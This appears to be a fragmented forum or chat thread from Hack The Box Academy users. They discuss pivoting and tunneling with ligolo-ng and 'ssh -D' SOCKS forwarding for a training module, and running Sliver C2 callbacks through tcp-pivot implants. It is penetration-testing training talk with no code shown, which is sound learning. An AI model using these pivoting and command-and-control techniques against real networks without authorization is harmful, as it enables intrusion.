And I am curious whether it is possible to achieve pivot and tunnel with ligolo? I found ligolo easier and more reliable to use other than proxychain and chisel.

Module Name: Dynamic Port forwarding with ssh and SOCKS Tunneling
Link: https://academy.hackthebox.com/module/158/section/1426
Question: I have been trying for a while now to tunnel using ssh with the following command ssh -D 9050 STIMP, which seems to work fine, however I just can't seem to tunnel through to the internal IP 172.16.5.129, I have tried multiple things and config's, and the one time I did manage to run an nmap scan with proxychains all the ports appeared as filtered. The goal is to tunnel through ssh and connect to the remote host using xfreerdp but I just can't establish a connection.

That’s what I did

Just used ligolo to reach the other network and tcp-pivot implants to connect the c2 back since ligolo can’t redirect sliver traffic

i found and tried this: https://medium.com/@iamalanf22/pivot-and-persist-ligolo-ng-sliver-integration-guide-ff1f6a691e7b

and it actually worked

I love french people

hi all! is it possible to reset the answers to boxes after you have completed them?

i would suggest you to reach support team for this as it is related to the platform

@slate zinc I just have a quick question
I'm trying to replace a body string, but for some reason it is not working
I also tried Match String = ip and Match String = 1
and both didn't work

idk what happened but it's working now -_-

I had to add /ping to the URL